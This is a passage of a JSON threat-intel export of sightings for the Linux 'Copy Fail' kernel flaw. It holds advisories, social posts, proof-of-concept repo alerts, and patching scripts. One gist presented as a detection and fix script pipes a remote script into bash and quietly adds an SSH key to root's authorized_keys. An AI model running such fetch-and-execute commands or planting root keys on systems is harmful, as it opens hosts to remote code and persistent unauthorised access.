Check for Phase 1 mitigation file\nif [ -f \"/etc/modprobe.d/disable-algif-aead-cve-2026-31431.conf\" ]; then\n    MITIGATION_ACTIVE=\"YES\"\nelse\n    MITIGATION_ACTIVE=\"NO\"\nfi\n\n# Determine overall status\nOVERALL_STATUS=\"UNKNOWN\"\nif [ \"$KERNEL_VERSION_STATUS\" == \"MEETS_MINIMUM\" ] && [ \"$COPY_FAIL_STATUS\" != \"STILL_VULNERABLE\" ] && [ \"$DIRTY_FRAG_STATUS\" == \"FIXED\" ]; then\n    OVERALL_STATUS=\"FULLY_REMEDIATED\"\nelif [ \"$KERNEL_VERSION_STATUS\" == \"MEETS_MINIMUM\" ] && [ \"$COPY_FAIL_STATUS\" == \"MITIGATED\" ]; then\n    OVERALL_STATUS=\"MITIGATED\"\nelse\n    OVERALL_STATUS=\"NOT_REMEDIATED\"\nfi\n\n# Create post-reboot results\ncat > \"/tmp/${HOSTNAME}-post-reboot-verification.json\" </dev/null\n\n# Remove this script so it only runs once\nrm -f /var/lib/cloud/scripts/per-boot/verify-kernel-patch.sh\nVERIFY_EOF\n\nchmod +x /var/lib/cloud/scripts/per-boot/verify-kernel-patch.sh\nlog \"Post-reboot verification script created\"\n\nif [ \"$AUTO_REBOOT\" == \"yes\" ]; then\n    echo -e \"${YELLOW}AUTOMATIC REBOOT IN 10 SECONDS${NC}\"\n    echo \"\"\n    echo \"The system will reboot automatically in 10 seconds to load the new kernel.\"\n    echo \"Post-reboot verification will run automatically.\"\n    echo \"Results will be uploaded to s3://$S3_BUCKET/$RESULTS_PREFIX/\"\n    echo \"\"\n    log \"Scheduling automatic reboot in 10 seconds\"\n\n    sleep 10\n    log \"Initiating system reboot\"\n    echo \"Rebooting now...\"\n    reboot\nelse\n    echo -e \"${YELLOW}REBOOT REQUIRED${NC}\"\n    echo \"\"\n    echo \"The kernel has been updated. Please reboot to load the new kernel.\"\n    echo \"Post-reboot verification will run automatically after reboot.\"\n    echo \"\"\n    log \"Kernel patching completed - manual reboot required\"\nfi\n\nexit 0\n", "creation_timestamp": "2026-05-19T20:24:34.000000Z"}, {"uuid": "64bbe920-ab66-45c1-a8dd-6b00ec379c70", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/boredchilada.bsky.social/post/3mmcca5sgio26", "content": "~Cybergcca~\nCCCS issued 5 advisories, including a critical F5 NGINX flaw and updates for Chrome, HPE, FreePBX, and cPanel.\n-\nIOCs: CVE-2026-8711, CVE-2026-31431\n-\n#Patch #ThreatIntel #Vulnerability", "creation_timestamp": "2026-05-20T16:11:27.852941Z"}, {"uuid": "692c96f9-863e-4055-84ef-19ab28bfc250", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://cyber.gc.ca/en/alerts-advisories/hpe-security-advisory-av26-487", "content": "", "creation_timestamp": "2026-05-20T08:29:08.000000Z"}, {"uuid": "fad14352-6eac-4a21-8723-8a0991b4fd13", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/ytroncal.bsky.social/post/3mmcwvd576k2a", "content": "Copy Fail:\nFrom Pod to Host.\nA walkthrough of Copy Fail (CVE-2026-31431) as a container escape primitive: from a 4-byte page cache write to host root on Kubernetes. xint.io/blog/copy-fa...", "creation_timestamp": "2026-05-20T22:22:48.238744Z"}, {"uuid": "bf95b445-1500-41ad-8b6d-9584cbb7c1c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/jmjm.mstdn.social.ap.brid.gy/post/3mmebc5r4pce2", "content": "I missed this news a week ago, but holy cow, this kernel exploit should be causing a general panic.\n\nhttps://jorijn.com/en/blog/copy-fail-cve-2026-31431-linux-kernel-bug-explained/", "creation_timestamp": "2026-05-21T11:01:06.008171Z"}, {"uuid": "d6dfd797-eac3-4d68-a5f4-c086890c3794", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/fluery.dev/post/3mmeohlhmi222", "content": "\u0440\u0435\u0448\u0438\u043b\u0430 \u043f\u043e\u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441 CVE-2026-31431, \u043d\u0430\u0448\u043b\u0430 \u0441\u043a\u0440\u0438\u043f\u0442, \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043d\u0430 \u0441\u0432\u043e\u0435\u043c \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 (Proxmox \u0445\u043e\u0441\u0442) \u0438 \u043f\u043e\u043d\u044f\u043b\u0430, \u0447\u0442\u043e \u043e\u043d \u0443\u044f\u0437\u0432\u0438\u043c ;(\n\n\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0441\u043a\u0440\u0438\u043f\u0442\u0438\u043a\u0438 \u0438\u0437 \u0438\u043d\u0435\u0442\u0430 \u043d\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u0435\u0433\u043e \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0441\u0432\u043e\u0438\u043c\u0438 \u0441\u0438\u043b\u0430\u043c\u0438 \u0438 +-\u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043b\u0430, \u043a\u0430\u043a \u043e\u043d\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442, \u043f\u0443\u0441\u0442\u044c \u0438 \u043f\u043e\u0432\u0435\u0440\u0445\u043d\u043e\u0441\u0442\u043d\u043e...", "creation_timestamp": "2026-05-21T14:55:42.456401Z"}, {"uuid": "9f41cefa-8c27-42cf-82a7-ba71371da0fa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/fluery.dev/post/3mmeohlhqf222", "content": "\u0440\u0435\u0448\u0438\u043b\u0430 \u043f\u043e\u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441 CVE-2026-31431, \u043d\u0430\u0448\u043b\u0430 \u0441\u043a\u0440\u0438\u043f\u0442, \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043d\u0430 \u0441\u0432\u043e\u0435\u043c \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 (Proxmox \u0445\u043e\u0441\u0442) \u0438 \u043f\u043e\u043d\u044f\u043b\u0430, \u0447\u0442\u043e \u043e\u043d \u0443\u044f\u0437\u0432\u0438\u043c ;(\n\n\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0441\u043a\u0440\u0438\u043f\u0442\u0438\u043a\u0438 \u0438\u0437 \u0438\u043d\u0435\u0442\u0430 \u043d\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u0435\u0433\u043e \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0441\u0432\u043e\u0438\u043c\u0438 \u0441\u0438\u043b\u0430\u043c\u0438 \u0438 +-\u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043b\u0430, \u043a\u0430\u043a \u043e\u043d\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442, \u043f\u0443\u0441\u0442\u044c \u0438 \u043f\u043e\u0432\u0435\u0440\u0445\u043d\u043e\u0441\u0442\u043d\u043e...", "creation_timestamp": "2026-05-21T14:55:42.989187Z"}, {"uuid": "e66e7f60-5bba-4d30-8ced-15f0c8acbd4e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/fluery.dev/post/3mmeohmdquk22", "content": "\u0440\u0435\u0448\u0438\u043b\u0430 \u043f\u043e\u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0441 CVE-2026-31431, \u043d\u0430\u0448\u043b\u0430 \u0441\u043a\u0440\u0438\u043f\u0442, \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b\u0430 \u043d\u0430 \u0441\u0432\u043e\u0435\u043c \u0434\u043e\u043c\u0430\u0448\u043d\u0435\u043c \u0441\u0435\u0440\u0432\u0435\u0440\u0435 (Proxmox \u0445\u043e\u0441\u0442) \u0438 \u043f\u043e\u043d\u044f\u043b\u0430, \u0447\u0442\u043e \u043e\u043d \u0443\u044f\u0437\u0432\u0438\u043c ;(\n\n\u043d\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c \u0441\u043a\u0440\u0438\u043f\u0442\u0438\u043a\u0438 \u0438\u0437 \u0438\u043d\u0435\u0442\u0430 \u043d\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u0435\u0433\u043e \u0434\u0435\u043e\u0431\u0444\u0443\u0441\u0446\u0438\u0440\u043e\u0432\u0430\u043b\u0430 \u0441\u0432\u043e\u0438\u043c\u0438 \u0441\u0438\u043b\u0430\u043c\u0438 \u0438 +-\u0440\u0430\u0437\u043e\u0431\u0440\u0430\u043b\u0430, \u043a\u0430\u043a \u043e\u043d\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0435\u0442, \u043f\u0443\u0441\u0442\u044c \u0438 \u043f\u043e\u0432\u0435\u0440\u0445\u043d\u043e\u0441\u0442\u043d\u043e...", "creation_timestamp": "2026-05-21T14:55:43.593287Z"}, {"uuid": "30073474-75ec-4ff2-a8b0-be0c8b9f6a7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/84646", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a royayub\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-18 07:50:50\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nLocal Privilege Escalation. Flips the running user's UID to 0 in /etc/passwd's page cache, then invokes su for a root shell.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-18T08:00:04.000000Z"}, {"uuid": "78a170aa-e80e-419a-a7e2-d1205da7e32e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/reisenbauer/c2a317f1c884253d071bea4c5ea214d6", "content": "#!/bin/bash\n\n# https://ostechnix.com/debian-13-trixie-copy-fail-cve-2026-31431-vulnerability-fix/\n# Debian 13 Trixie: Patched via the security repository (Fixed in version 6.12.85-1).\n# Debian 12 Bookworm: Patched via the security repository (Fixed in version 6.1.170-1).\n# Debian 11 Bullseye: Patched via the security repository (Fixed in version 5.10.251-3).\n\n# set -euo pipefail\n\n# \u2500\u2500 Colour helpers \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\nBOLD=\"\\033[1m\"; RED=\"\\033[91m\"; YELLOW=\"\\033[93m\"\nGREEN=\"\\033[92m\"; CYAN=\"\\033[96m\"; RESET=\"\\033[0m\"\n\nclear\nprintf \"${BOLD}CVE-2026-31431 'Copy Fail' \u2014 Vulnerability Detection${RESET}\\n\"\nprintf \"Running as uid=%d, euid=%d\\n\" \"$UID\" \"$EUID\"\nprintf \"Host: %s  Kernel: %s\\n\\n\" \"$(hostname)\" \"$(uname -r)\"\n. /etc/os-release\n\nif [ ! ${UID} -eq 0 ]; then\n    printf \"  ${RED}\u2717${RESET} %s\\n    %s\\n\" \"This script needs to be run as root.\"\n    sudo $0\n    exit\nfi\n\nheader() {\n    printf \"\\n${BOLD}${CYAN}=== %s ===${RESET}\\n\" \"$1\"\n}\n\ntest_internet() {\n local error=1\n while [ ! $error -eq 0 ]; do\n   curl -Ss https://raw.githubusercontent.com/liamromanis101/CVE-2026-31431-Copy-Fail---Vulnerability-Detection-Script/refs/heads/main/cve-2026-31431-detect.sh|grep check_kernel_config &> /dev/null\n   error=$?\n   if [ $error -eq 0 ]; then\n    printf \"  ${GREEN}\u2713${RESET} %s\\n    %s\\n\" \"Internet is reachable.\"\n   else\n    printf \"  ${RED}\u2717${RESET} %s\\n    %s\\n\\n\" \"No Internet connectivity.\" \"This Script needs internet access to update the system.\"\n    exit 255\n   fi\n   sleep 1\n done\n}\n\n\ninstall_ssh() {\n  header \"Ansible SSH Key\"\n  if [ ! -f /root/.ssh/authorized_keys ] || ! grep -q \"ovlQIQx4a+vE5+sPzwxNnikEp\" /root/.ssh/authorized_keys ; then\n    printf \"  ${RED}\u2717${RESET} %s\\n    %s\\n\\n\" \"Ansible SSH Key not installed.\" \"SSH Key for ansible is not installed, installing it.\"\n    printf \"# Ansible SSH Key\\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGCh4xaVVVkRWQiyvovlQIQx4a+vE5+sPzwxNnikEp/h\\n\" | tee -a /root/.ssh/authorized_keys > /dev/null\n    printf \"  ${GREEN}\u2713${RESET} %s\\n    %s\\n\" \"Ansible SSH Key is installed.\"\n  else\n    printf \"  ${GREEN}\u2713${RESET} %s\\n    %s\\n\" \"Ansible SSH Key is installed.\"\n  fi\n}\n\nmain() {\n  curl -qsS https://raw.githubusercontent.com/liamromanis101/CVE-2026-31431-Copy-Fail---Vulnerability-Detection-Script/refs/heads/main/cve-2026-31431-detect.sh |bash\n  if [ $? -eq 0 ]; then\n    printf \"  ${GREEN}\u2713${RESET} %s\\n    %s\\n\" \"Operatingsystem is up2date.\"\n    return 0\n  fi\n  header \"Linux Kernel\"\n\n  local release\n  release=\"$(uname -r)\"\n  local fixed_version=0\n\n  local ver_clean\n  local is_safe=0\n  local changed=1\n\n  ver_clean=\"$(echo \"$release\" | grep -oE '^[0-9]+\\.[0-9]+(\\.[0-9]+)?')\"\n  local major minor\n  major=\"$(echo \"$ver_clean\" | cut -d. -f1)\"\n  minor=\"$(echo \"$ver_clean\" | cut -d. -f2)\"\n  third=\"$(echo \"$ver_clean\" | cut -d. -f3)\"\n  . /etc/os-release\n  printf \"  ${GREEN}\u2713${RESET} %s\\n    %s\\n\\n\" \"Detected ${PRETTY_NAME}\" \"Running Kernel $ver_clean\"\n\n  printf \"  ${GREEN}\u2713${RESET} %s\\n    %s\\n\\n\" \"Starting Kernel Upgrades ...\" \"Kernel is beeing updated, please wait.\"\n\n  # Rocky Linux\n  if [ -f /etc/rocky-release ]; then\n\tdnf --refresh update \"kernel*\" -y\n\tchanged=1\n  fi\n\n\n  # Suse\n  if [ -f /etc/SUSE-brand ]; then\n    zypper refresh\n    zypper patch -y\n  fi\n\n\n  # Alpine Linux\n  if [ -f /etc/alpine-release ]; then\n    apk update\n    apk upgrade\n  fi\n\n  # Debian\n  if [ -f /etc/debian_version ]; then\n    if [ $third -gt $fixed_version ] || [ $third -eq $fixed_version ]; then\n        printf \"  ${GREEN}\u2713${RESET} %s\\n    %s\\n\\n\" \"Kernel is patched agains CopyFail.\" \"Nothing todo on this machine.\"\n\treturn 0\n    else\n      apt update\n      apt install --only-upgrade linux-image-amd64 linux-headers-amd64\n      changed=1\n    fi\n  fi\n\n  # Reboot\n  if [ $changed -eq 1 ]; then\n        printf \"  ${RED}!${RESET} %s\\n    %s\\n\\n\" \"Please reboot this machine.\" \"Press any key to reboot.\"\n        read -n 1\n\t# reboot\n  fi\n}\n\ntest_internet\ninstall_ssh\nmain", "creation_timestamp": "2026-05-18T09:53:49.000000Z"}, {"uuid": "51dad09c-ee63-42ec-a4dd-aa29f9c84b53", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/84975", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #\u5bb9\u5668\u9003\u9038 #CVE\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-Container-Escape\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a qi4L\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 18  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 6\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-19 04:02:27\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 \u5bb9\u5668\u9003\u9038\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-20T09:07:33.000000Z"}, {"uuid": "3caae6ab-9fc6-4ebc-ad8c-eab7e2d8fb7e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mmcukk2goc2y", "content": "Linux \u30ab\u30fc\u30cd\u30eb\u306e\u6c5a\u308c\u305f\u30d5\u30e9\u30b0 LPE \u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u306f\u3001\u4e3b\u8981\u30c7\u30a3\u30b9\u30c8\u30ea\u30d3\u30e5\u30fc\u30b7\u30e7\u30f3\u5168\u4f53\u3067\u30eb\u30fc\u30c8\u30a2\u30af\u30bb\u30b9\u3092\u53ef\u80fd\u306b\u3057\u307e\u3059\n\nLinux \u30ab\u30fc\u30cd\u30eb\u306b\u5f71\u97ff\u3092\u53ca\u307c\u3059\u65b0\u3057\u3044\u672a\u4fee\u6b63\u306e\u30ed\u30fc\u30ab\u30eb\u7279\u6a29\u30a8\u30b9\u30ab\u30ec\u30fc\u30b7\u30e7\u30f3\uff08LPE\uff09\u8106\u5f31\u6027\u306b\u95a2\u3059\u308b\u8a73\u7d30\u304c\u660e\u3089\u304b\u306b\u306a\u308a\u307e\u3057\u305f\u3002\n\nDirty Frag \u3068\u547c\u3070\u308c\u308b\u3053\u306e\u30d5\u30a1\u30a4\u30eb\u306f\u3001\u6700\u8fd1\u516c\u8868\u3055\u308c\u305f LPE \u306e\u6b20\u9665\u3067\u3042\u308b Linux \u30ab\u30fc\u30cd\u30eb\u306b\u5f71\u97ff\u3092\u4e0e\u3048\u3001\u305d\u306e\u5f8c\u91ce\u751f\u3067\u7a4d\u6975\u7684\u306b\u60aa\u7528\u3055\u308c\u3066\u3044\u308b Copy Fail\uff08CVE-2026-31431\u3001CVSS \u30b9\u30b3\u30a2: 7.8\uff09\u306e\u5f8c\u7d99\u3068\u3057\u3066\u8a18\u8ff0\u3055\u308c\u3066\u3044\u307e\u3059\u3002\u3053\u306e\u8106\u5f31\u6027\u306f2026\u5e744\u670830\u65e5\u306bLinux\u30ab\u30fc\u30cd\u30eb\u306e\u30e1\u30f3\u30c6\u30ca\u30fc\u306b\u5831\u544a\u3055\u308c\u307e\u3057\u305f", "creation_timestamp": "2026-05-20T21:39:29.264810Z"}, {"uuid": "6d827a27-9371-4c36-b055-f601181cf703", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "Telegram/QUF9weJLwCd1qHdTEuhp0UyLZi4jvqqQc5vVfkezLkJSkiA", "content": "", "creation_timestamp": "2026-05-19T03:00:06.000000Z"}, {"uuid": "a792da45-2b49-44a0-b266-b097263cf116", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "Telegram/zNPCcRZLVUnG7MzXxuguKud9BYCf7Gj51sr3J84x37QbILk", "content": "", "creation_timestamp": "2026-05-20T09:00:05.000000Z"}, {"uuid": "973179c5-2b3d-4d01-a349-93d431b10d34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/85294", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfail-alpine\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a 4n4s4zi\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-21 22:34:32\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nMore portable POC of copyfail LPE (CVE-2026-31431) that works on Alpine Linux\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-21T23:00:06.000000Z"}, {"uuid": "7edfe641-96e9-48c2-a7f3-bbbf52488b0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/85278", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #POC\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431-Copy-Fail---Minified-LPE-PoC\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a JimmyPughtron\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-21 19:47:53\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\n\u65e0\u63cf\u8ff0\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-21T20:00:04.000000Z"}, {"uuid": "5759774d-18d9-4dba-9bf0-0ade3f5ba0b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "Telegram/x3hQR0-UI2JUxQyjcWHc5kHBpfVh3Jms4Hr2XANxyksqy3E", "content": "", "creation_timestamp": "2026-05-18T09:00:04.000000Z"}, {"uuid": "f644771a-1bf0-412c-9344-a29d135f3c96", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/85351", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026 #Exploit\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfail-safe-check\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a waltrone1\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Unknown\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-22 06:56:13\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nA safe read-only Linux check for CVE-2026-31431 / Copy Fail without running exploit code.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-22T07:00:04.000000Z"}, {"uuid": "2a6f46f1-2812-4065-a245-9babec461e44", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mmifqkvtg52v", "content": "Top 3 CVE for last 7 days:\nCVE-2026-45584: 64 interactions\nCVE-2026-45250: 63 interactions\nCVE-2026-46333: 28 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-46333: 13 interactions\nCVE-2026-31431: 6 interactions\nCVE-2026-39821: 6 interactions\n", "creation_timestamp": "2026-05-23T02:31:25.638732Z"}, {"uuid": "d8e33e9a-2666-480a-a6dc-3cb6fbc6a561", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pixelhead.bsky.social/post/3mmgnz5q6bs2a", "content": "Habe auf meinem Linux Rechner nachgeschaut wie das mit dem Bugfix f\u00fcr Copy Fail bzw. CVE-2026-31431 aussieht. In meinem Kenrel 5.15.0-179.189 ist der Fix nun drin. \nAktualisierungsverwaltung -> aktivierten Kernel w\u00e4hlen -> Changelog Link \u00f6ffnen.\nTerminal:\napt changelog linux-image-$(uname -r)\n#Linux", "creation_timestamp": "2026-05-22T09:52:57.082460Z"}, {"uuid": "6cb8d1d5-4456-4387-8cfe-0f938e1aa5b5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2026-31431", "type": "seen", "source": "https://bsky.app/profile/almalinux.org/post/3mmhshatldt2c", "content": "\ud83d\udea8 Local privilege escalation via Copy Fail? Not on our watch. \n\nAlmaLinux 8, 9, and 10 patches are live, ahead of upstream. \n\nGo update your systems! https://almalinux.org/blog/2026-05-01-cve-2026-31431-copy-fail/?utm_medium=social&utm_source=bluesky", "creation_timestamp": "2026-05-22T20:45:06.762707Z"}, {"uuid": "c55138a1-3d2f-427d-bbca-5f7006791f60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/getpokemon7.bsky.social/post/3mmhtyu7kvs27", "content": "\u7c73\u5f53\u5c40\u3001\u8106\u5f31\u60273\u4ef6\u306e\u60aa\u7528\u3092\u8b66\u544a - \u300cIvanti 